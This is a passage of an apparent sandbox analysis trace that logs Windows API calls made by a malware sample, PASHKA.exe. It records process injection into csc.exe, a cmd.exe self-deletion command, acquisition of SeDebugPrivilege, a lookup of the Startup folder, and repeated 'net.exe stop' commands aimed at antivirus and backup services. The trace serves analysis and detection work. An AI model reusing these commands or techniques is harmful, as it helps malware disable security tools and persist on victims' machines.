ProcessHandle=0x14c, BaseAddress=0x5125008, Buffer=0x1000b4*, NumberOfBytesToWrite=0x4, NumberOfBytesWritten=0x0 | out: Buffer=0x1000b4*, NumberOfBytesWritten=0x0) returned 0x0 [0040.206] NtSetContextThread (ThreadHandle=0x148, Context=0xf4f338*(ContextFlags=0x10007, Dr0=0xa3, Dr1=0x36, Dr2=0xdd, Dr3=0x94, Dr6=0xe5, Dr7=0x18, FloatSave.ControlWord=0xa8, FloatSave.StatusWord=0x67, FloatSave.TagWord=0x86, FloatSave.ErrorOffset=0xa7, FloatSave.ErrorSelector=0xff, FloatSave.DataOffset=0xfd, FloatSave.DataSelector=0xe9, FloatSave.RegisterArea=([0]=0x1b, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x1f, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x93, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x45, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0xf4, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x19, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x7d, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x43, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0xda, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0xac, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0xcf, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x4f, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x40, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0xc0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x65, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x41, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0xc5, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x7a, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0xcc, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x39, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x3c, SegGs=0x2b, SegFs=0x53, SegEs=0x2b, SegDs=0x2b, Edi=0x0, Esi=0x0, Ebx=0x5125000, Edx=0x0, Ecx=0x0, Eax=0x40d302, Ebp=0x0, Eip=0x77404210, SegCs=0x23, EFlags=0x202, Esp=0x53ffc10, SegSs=0x2b, ExtendedRegisters=([0]=0x57, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x3a, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x38, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x2b, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x64, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x10, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x56, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x4e, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0xcb, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0xae, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x3d, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0xb3, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x5e, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x58, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x20, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0xd3, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x7, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x8, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x8e, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x2a, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0xf5, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x48, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0xbf, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x75, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0xfc, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x26, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x9d, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0xb2, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x77, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x35, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x8f, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0xd5, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x2c, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x2f, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x15, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0xef, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x4c, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0xce, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0xa1, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x9f, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x89, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x5a, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x29, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x9c, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x1d, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x72, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x37, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x66, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x98, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0xe6, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x68, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0xa0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x42, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x8c, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x52, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x28, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0xc, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0xdc, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x3f, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0xa9, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x84, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x9, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0xc7, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x6, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x4d, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x51, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0xdf, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0xf8, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x73, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0xb9, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0xc3, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x16, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0xc6, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x71, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x46, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x6b, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x6d, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0xca, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x8d, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x31, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0xd1, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0xd2, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0xe, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x9b, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0xa2, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x79, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x3, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x12, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0xb0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x6a, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x50, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x92, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0xc8, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0xfa, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0xf, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x60, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x22, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0xaf, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x5, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0xf2, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x7e, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0xd7, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x80, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x99, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x3b, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x95, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0xbe, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x2d, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0xb8, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0xe7, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x5c, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x30, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x88, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x54, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x81, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x11, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x82, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0xd6, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0xd0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0xad, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0xd, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x9e, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0xa5, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0xfe, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x7c, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0xd9, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0xb6, [509]=0x0, [510]=0x0, [511]=0x0))) returned 0x0 [0040.211] NtResumeThread (in: ThreadHandle=0x148, SuspendCount=0x0 | out: SuspendCount=0x0) returned 0x0 [0040.257] NtClose (Handle=0x148) returned 0x0 [0040.264] NtClose (Handle=0x14c) returned 0x0 [0040.370] VirtualFree (lpAddress=0x100000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0040.373] GetModuleFileNameA (in: hModule=0x0, lpFilename=0xf4f560, nSize=0x104 | out: lpFilename="C:\\Users\\FD1HVy\\Desktop\\PASHKA.exe" (normalized: "c:\\users\\fd1hvy\\desktop\\pashka.exe")) returned 0x22 [0040.373] __stdio_common_vsprintf (in: _Options=0x25, _Buffer=0xf4f358, _BufferCount=0x207, _Format="cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q \"%s\"", _Locale=0x0, _ArgList=0xf4f2fc | out: _Buffer="cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q \"C:\\Users\\FD1HVy\\Desktop\\PASHKA.exe\"") returned 91 [0040.375] CreateProcessA (in: lpApplicationName=0x0, lpCommandLine="cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q \"C:\\Users\\FD1HVy\\Desktop\\PASHKA.exe\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0xf4f310*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0xf4f300 | out: lpCommandLine="cmd.exe /C ping 1.1.1.1 -n 1 -w 3000 > Nul & Del /f /q \"C:\\Users\\FD1HVy\\Desktop\\PASHKA.exe\"", lpProcessInformation=0xf4f300*(hProcess=0x148, hThread=0x14c, dwProcessId=0xd3c, dwThreadId=0x88c)) returned 1 [0040.643] CloseHandle (hObject=0x14c) returned 1 [0040.645] CloseHandle (hObject=0x148) returned 1 [0040.647] ExitProcess (uExitCode=0x0) Thread: id = 2 os_tid = 0x2d4 Process: id = "2" image_name = "csc.exe" filename = "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\csc.exe" page_root = "0x576f0000" os_pid = "0xde0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0xfc8" cmd_line = "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000faa5" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 3 os_tid = 0xaac [0047.131] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0047.134] RoInitialize () returned 0x1 [0047.135] RoUninitialize () returned 0x0 [0050.651] CreateMutexW (lpMutexAttributes=0x0, bInitialOwner=0, lpName="Global\\c1a76b5a-12ab-45c5-b9d9-d692faa6e7a2") returned 0x2ac [0050.654] CloseHandle (hObject=0x2ac) returned 1 [0050.665] GetCurrentProcessId () returned 0xde0 [0050.680] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x53fe794 | out: lpLuid=0x53fe794*(LowPart=0x14, HighPart=0)) returned 1 [0050.682] GetCurrentProcess () returned 0xffffffff [0050.683] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x20, TokenHandle=0x53fe790 | out: TokenHandle=0x53fe790*=0x2b4) returned 1 [0050.684] AdjustTokenPrivileges (in: TokenHandle=0x2b4, DisableAllPrivileges=0, NewState=0x755b30c*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0050.684] CloseHandle (hObject=0x2b4) returned 1 [0050.689] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0xde0) returned 0x2b4 [0050.700] EnumProcessModules (in: hProcess=0x2b4, lphModule=0x755b350, cb=0x100, lpcbNeeded=0x53fef04 | out: lphModule=0x755b350, lpcbNeeded=0x53fef04) returned 1 [0050.703] GetModuleInformation (in: hProcess=0x2b4, hModule=0x400000, lpmodinfo=0x755b49c, cb=0xc | out: lpmodinfo=0x755b49c*(lpBaseOfDll=0x400000, SizeOfImage=0x12000, EntryPoint=0x0)) returned 1 [0050.704] CoTaskMemAlloc (cb=0x804) returned 0x5465a78 [0050.705] GetModuleBaseNameW (in: hProcess=0x2b4, hModule=0x400000, lpBaseName=0x5465a78, nSize=0x800 | out: lpBaseName="csc.exe") returned 0x7 [0050.706] CoTaskMemFree (pv=0x5465a78) [0050.707] CoTaskMemAlloc (cb=0x804) returned 0x5465a78 [0050.707] GetModuleFileNameExW (in: hProcess=0x2b4, hModule=0x400000, lpFilename=0x5465a78, nSize=0x800 | out: lpFilename="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\csc.exe" (normalized: "c:\\windows\\microsoft.net\\framework\\v4.0.30319\\csc.exe")) returned 0x35 [0050.707] CoTaskMemFree (pv=0x5465a78) [0050.710] CloseHandle (hObject=0x2b4) returned 1 [0051.829] CoTaskMemAlloc (cb=0x20c) returned 0x546ace8 [0051.829] SHGetFolderPathW (in: hwnd=0x0, csidl=7, hToken=0x0, dwFlags=0x0, pszPath=0x546ace8 | out: pszPath="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 0x0 [0051.848] CoTaskMemFree (pv=0x546ace8) [0051.855] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\.NETFramework\\AppContext", ulOptions=0x0, samDesired=0x20019, phkResult=0x53fe700 | out: phkResult=0x53fe700*=0x0) returned 0x2 [0051.855] RegCloseKey (hKey=0x80000002) returned 0x0 [0051.859] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", nBufferLength=0x105, lpBuffer=0x53fe954, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpFilePart=0x0) returned 0x4d [0051.955] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0051.959] CreatePipe (in: hReadPipe=0x53fedd8, hWritePipe=0x53fedd4, lpPipeAttributes=0x53fed58, nSize=0x0 | out: hReadPipe=0x53fedd8*=0x334, hWritePipe=0x53fedd4*=0x344) returned 1 [0051.961] GetCurrentProcess () returned 0xffffffff [0051.961] GetCurrentProcess () returned 0xffffffff [0051.961] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x334, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x53feddc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x53feddc*=0x34c) returned 1 [0051.961] CloseHandle (hObject=0x334) returned 1 [0051.961] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0051.962] CoTaskMemAlloc (cb=0x20e) returned 0x546b9d0 [0051.962] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x546b9d0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0051.962] CoTaskMemFree (pv=0x546b9d0) [0051.963] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop avpsus /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x53fed20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x344, hStdError=0x0), lpProcessInformation=0x755f394 | out: lpCommandLine="\"net.exe\" stop avpsus /y", lpProcessInformation=0x755f394*(hProcess=0x350, hThread=0x334, dwProcessId=0xe20, dwThreadId=0xe3c)) returned 1 [0052.226] CloseHandle (hObject=0x344) returned 1 [0052.229] GetFileType (hFile=0x34c) returned 0x3 [0052.230] CloseHandle (hObject=0x334) returned 1 [0052.232] ReadFile (in: hFile=0x34c, lpBuffer=0x755fb2c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x53feeb0, lpOverlapped=0x0 | out: lpBuffer=0x755fb2c, lpNumberOfBytesRead=0x53feeb0*=0x0, lpOverlapped=0x0) returned 0 [0053.501] GetCurrentProcess () returned 0xffffffff [0053.501] GetCurrentProcess () returned 0xffffffff [0053.502] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x350, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x53fee98, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x53fee98*=0x334) returned 1 [0053.506] CloseHandle (hObject=0x334) returned 1 [0053.508] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0053.508] CreatePipe (in: hReadPipe=0x53fedd8, hWritePipe=0x53fedd4, lpPipeAttributes=0x53fed58, nSize=0x0 | out: hReadPipe=0x53fedd8*=0x334, hWritePipe=0x53fedd4*=0x344) returned 1 [0053.508] GetCurrentProcess () returned 0xffffffff [0053.508] GetCurrentProcess () returned 0xffffffff [0053.508] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x334, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x53feddc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x53feddc*=0x358) returned 1 [0053.508] CloseHandle (hObject=0x334) returned 1 [0053.508] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0053.508] CoTaskMemAlloc (cb=0x20e) returned 0x546b9d0 [0053.508] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x546b9d0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0053.509] CoTaskMemFree (pv=0x546b9d0) [0053.509] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop McAfeeDLPAgentService /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x53fed10*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x344, hStdError=0x0), lpProcessInformation=0x7562df0 | out: lpCommandLine="\"net.exe\" stop McAfeeDLPAgentService /y", lpProcessInformation=0x7562df0*(hProcess=0x354, hThread=0x334, dwProcessId=0x58, dwThreadId=0x60)) returned 1 [0053.520] CloseHandle (hObject=0x344) returned 1 [0053.520] GetFileType (hFile=0x358) returned 0x3 [0053.521] CloseHandle (hObject=0x334) returned 1 [0053.521] ReadFile (in: hFile=0x358, lpBuffer=0x75632d4, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x53feeb0, lpOverlapped=0x0 | out: lpBuffer=0x75632d4, lpNumberOfBytesRead=0x53feeb0*=0x0, lpOverlapped=0x0) returned 0 [0054.251] GetCurrentProcess () returned 0xffffffff [0054.251] GetCurrentProcess () returned 0xffffffff [0054.251] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x354, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x53fee98, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x53fee98*=0x334) returned 1 [0054.254] CloseHandle (hObject=0x334) returned 1 [0054.254] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0054.255] CreatePipe (in: hReadPipe=0x53fedd8, hWritePipe=0x53fedd4, lpPipeAttributes=0x53fed58, nSize=0x0 | out: hReadPipe=0x53fedd8*=0x334, hWritePipe=0x53fedd4*=0x344) returned 1 [0054.255] GetCurrentProcess () returned 0xffffffff [0054.255] GetCurrentProcess () returned 0xffffffff [0054.255] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x334, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x53feddc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x53feddc*=0x368) returned 1 [0054.255] CloseHandle (hObject=0x334) returned 1 [0054.255] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0054.255] CoTaskMemAlloc (cb=0x20e) returned 0x546b9d0 [0054.255] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x546b9d0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0054.255] CoTaskMemFree (pv=0x546b9d0) [0054.255] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop mfewc /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x53fed20*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x344, hStdError=0x0), lpProcessInformation=0x7566588 | out: lpCommandLine="\"net.exe\" stop mfewc /y", lpProcessInformation=0x7566588*(hProcess=0x364, hThread=0x334, dwProcessId=0xd2c, dwThreadId=0x89c)) returned 1 [0054.266] CloseHandle (hObject=0x344) returned 1 [0054.266] GetFileType (hFile=0x368) returned 0x3 [0054.266] CloseHandle (hObject=0x334) returned 1 [0054.266] ReadFile (in: hFile=0x368, lpBuffer=0x7566a5c, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x53feeb0, lpOverlapped=0x0 | out: lpBuffer=0x7566a5c, lpNumberOfBytesRead=0x53feeb0*=0x0, lpOverlapped=0x0) returned 0 [0054.836] GetCurrentProcess () returned 0xffffffff [0054.836] GetCurrentProcess () returned 0xffffffff [0054.836] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x364, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x53fee98, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x53fee98*=0x334) returned 1 [0054.839] CloseHandle (hObject=0x334) returned 1 [0054.840] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0054.840] CreatePipe (in: hReadPipe=0x53fedd8, hWritePipe=0x53fedd4, lpPipeAttributes=0x53fed58, nSize=0x0 | out: hReadPipe=0x53fedd8*=0x334, hWritePipe=0x53fedd4*=0x344) returned 1 [0054.840] GetCurrentProcess () returned 0xffffffff [0054.840] GetCurrentProcess () returned 0xffffffff [0054.840] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x334, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x53feddc, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x53feddc*=0x370) returned 1 [0054.840] CloseHandle (hObject=0x334) returned 1 [0054.840] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0054.840] CoTaskMemAlloc (cb=0x20e) returned 0x546b9d0 [0054.840] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x546b9d0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0054.841] CoTaskMemFree (pv=0x546b9d0) [0054.841] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"net.exe\" stop BMR Boot Service /y", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x8000000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x53fed1c*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x100, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x344, hStdError=0x0), lpProcessInformation=0x7569d14 | out: lpCommandLine="\"net.exe\" stop BMR Boot Service /y", lpProcessInformation=0x7569d14*(hProcess=0x36c, hThread=0x334, dwProcessId=0x484, dwThreadId=0xe04)) returned 1 [0054.852] CloseHandle (hObject=0x344) returned 1 [0054.852] GetFileType (hFile=0x370) returned 0x3 [0054.852] CloseHandle (hObject=0x334) returned 1 [0054.852] ReadFile (in: hFile=0x370, lpBuffer=0x756a1f0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x53feeb0, lpOverlapped=0x0 | out: lpBuffer=0x756a1f0, lpNumberOfBytesRead=0x53feeb0*=0x0, lpOverlapped=0x0) returned 0 [0055.622] GetCurrentProcess () returned 0xffffffff [0055.622] GetCurrentProcess () returned 0xffffffff [0055.622] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x36c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x53fee98, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x53fee98*=0x334) returned 1 [0055.625] CloseHandle (hObject=0x334) returned 1 [0055.626] GetStdHandle (nStdHandle=0xfffffff6) returned 0x0 [0055.626] CreatePipe (in: hReadPipe=0x53fedd8, hWritePipe=0x53fedd4, lpPipeAttributes=0x53fed58, nSize=0x0 | out: hReadPipe=0x53fedd8*=0x334, hWritePipe=0x53fedd4*=0x344) returned 1 [0055.626] GetCurrentProcess () returned 0xffffffff [0055.626] 